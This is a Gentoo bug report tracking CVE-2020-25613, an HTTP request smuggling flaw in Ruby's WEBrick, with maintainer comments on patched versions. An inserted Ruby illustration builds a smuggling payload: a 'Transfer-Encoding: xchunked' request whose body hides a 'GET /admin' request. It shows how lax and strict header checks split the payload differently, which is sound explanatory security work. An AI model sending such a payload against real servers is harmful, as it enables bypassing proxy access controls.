
Bug 747007 (CVE-2020-25613)

Summary: <dev-lang/ruby-{2.5.9,2.6.7,2.7.3}: HTTP Request Smuggling Vulnerability in WEBrick (CVE-2020-25613)
Product: Gentoo Security
Reporter: filip ambroz <filip.ambroz>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: minor
CC: ajak, ruby
Priority: Normal
Version: unspecified
Hardware: All
OS: Linux
URL: https://www.ruby-lang.org/en/news/2020/09/29/http-request-smuggling-cve-2020-25613/
See Also: https://bugs.ruby-lang.org/issues/17201
Whiteboard: A4 [glsa+]
Package list:
Runtime testing required: ---

Description filip ambroz 2020-10-07 07:01:06 UTC
An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.

GitHub Commit:
https://github.com/ruby/webrick/commit/8946bb38b4d87549f0d99ed73c62c41933f97cc7

Links:
https://nvd.nist.gov/vuln/detail/CVE-2020-25613
https://osint.geekcq.com/2020/10/06/cve-2020-25613/

Reproducible: Always
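The following is an added illustration of the header-check mismatch the description refers to; it is not WEBrick's code and not part of this bug report. It parses the same raw request bytes twice, once with a lax Transfer-Encoding test and once with a strict one, and shows that the two hops end up with a different number of requests. Assumptions: the lax predicate (substring match on "chunked") is a model of a "not rigorous" check, not a quote of WEBrick's pre-fix source; the strict predicate anchors the token; the request bytes and host names are constructed for the example.

```ruby
# Added example, not WEBrick's own code: how a lax Transfer-Encoding check
# lets a front-end and a back-end disagree about where one request ends.
require 'stringio'

# Lax check: any value containing "chunked" counts as chunked.
# Assumption: this models the non-rigorous check described in the advisory;
# it is not a quote of WEBrick's source.
def lax_chunked?(te)
  !!(te =~ /chunked/i)
end

# Strict check: only the exact token "chunked" counts; "xchunked" or
# "chunked, identity" fall through to Content-Length framing.
def strict_chunked?(te)
  !!(te =~ /\Achunked\z/i)
end

# Minimal HTTP/1.1 parser. Body framing follows whichever chunked? predicate
# is passed in, so the same bytes can be split differently by two hops.
# Returns [method, path, headers, body] or nil at end of stream.
def parse_request(io, chunked_pred)
  request_line = io.gets("\r\n")
  return nil if request_line.nil? || request_line.strip.empty?
  method, path, = request_line.strip.split(' ', 3)
  headers = {}
  while (line = io.gets("\r\n")) && line != "\r\n"
    name, value = line.split(':', 2)
    headers[name.strip.downcase] = value.to_s.strip
  end
  body = +''
  te = headers['transfer-encoding']
  if te && chunked_pred.call(te)
    # chunked framing: read chunks until a zero-size chunk
    while (size_line = io.gets("\r\n"))
      size = size_line.to_i(16)
      break if size.zero?
      body << io.read(size)
      io.read(2) # CRLF that terminates the chunk data
    end
    io.gets("\r\n") # empty line after the last chunk (no trailers here)
  elsif headers['content-length']
    body << io.read(headers['content-length'].to_i).to_s
  end
  [method, path, headers, body]
end

def split_requests(raw, chunked_pred)
  io = StringIO.new(raw)
  requests = []
  while (req = parse_request(io, chunked_pred))
    requests << req
  end
  requests
end

# Constructed attacker payload: a non-standard Transfer-Encoding token plus a
# Content-Length that covers a second, hidden request.
HIDDEN = "GET /admin HTTP/1.1\r\nHost: example.test\r\n\r\n"
SMUGGLED_BODY = "0\r\n\r\n" + HIDDEN
SMUGGLED = "POST / HTTP/1.1\r\nHost: example.test\r\n" \
           "Content-Length: #{SMUGGLED_BODY.bytesize}\r\n" \
           "Transfer-Encoding: xchunked\r\n\r\n" + SMUGGLED_BODY

# A strict hop sees one POST whose body is everything after the headers; a lax
# hop ends the POST at the zero chunk and then parses a GET /admin that the
# strict hop never saw as a request.
def requests_seen_by(checker)
  split_requests(SMUGGLED, method(checker)).map { |m, p, _h, body| [m, p, body.bytesize] }
end

if $PROGRAM_NAME == __FILE__
  p requests_seen_by(:strict_chunked?)
  p requests_seen_by(:lax_chunked?)
end
```

The strict predicate only fixes the token match; it still falls back to Content-Length when Transfer-Encoding carries an unrecognised value. A server that wants to close the smuggling window entirely should also refuse (HTTP 400) any request that carries both Transfer-Encoding and Content-Length, or that carries a Transfer-Encoding it does not implement, rather than silently choosing one framing.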
Comment 1 Hans de Graaff gentoo-dev Security 2020-10-09 08:00:53 UTC
dev-lang/ruby 2.7.2 has been added.

We do not package the webrick gem.

Upstream has not released new versions for the ruby 2.5 and 2.6 slots. I assume that this will be released shortly as well. If not then we can apply the patch sets from the referenced bug.
Comment 2 John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2021-07-24 17:50:30 UTC
Ruby 2.5 patch: d6d2f179b02855ce07e8a114b3611dfc1f590986
Ruby 2.6 patch: 8b49c3e4bc767bec8a66ac81cbda033330fb2703
Ruby 2.7 patch: 48ac73769772317d6c3f864f087ef930a47120d9

ruby $ git tag --contains d6d2f179b02855ce07e8a114b3611dfc1f590986
v2_5_9

ruby $ git tag --contains 8b49c3e4bc767bec8a66ac81cbda033330fb2703
v2_6_7
v2_6_8

ruby $ git tag --contains 48ac73769772317d6c3f864f087ef930a47120d9
v2_7_3
v2_7_4

3.0.0 is unaffected (it's always had the patch). Just waiting for 2.5 cleanup here now, removal in a couple weeks.
Comment 3 NATTkA bot gentoo-dev 2021-07-29 17:25:47 UTC
Package list is empty or all packages have requested keywords.
Comment 4 Larry the Git Cow gentoo-dev 2024-01-24 04:07:58 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/data/glsa.git/commit/?id=aea6781bb25fe500e38a2cfce23bf166d29cbf48

commit aea6781bb25fe500e38a2cfce23bf166d29cbf48
Author:     GLSAMaker <glsamaker@gentoo.org>
AuthorDate: 2024-01-24 04:04:06 +0000
Commit:     John Helmert III <ajak@gentoo.org>
CommitDate: 2024-01-24 04:06:47 +0000

    [ GLSA 202401-27 ] Ruby: Multiple vulnerabilities
    
    Bug: https://bugs.gentoo.org/747007
    Bug: https://bugs.gentoo.org/801061
    Bug: https://bugs.gentoo.org/827251
    Bug: https://bugs.gentoo.org/838073
    Bug: https://bugs.gentoo.org/882893
    Bug: https://bugs.gentoo.org/903630
    Signed-off-by: GLSAMaker <glsamaker@gentoo.org>
    Signed-off-by: John Helmert III <ajak@gentoo.org>

 glsa-202401-27.xml | 65 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 65 insertions(+)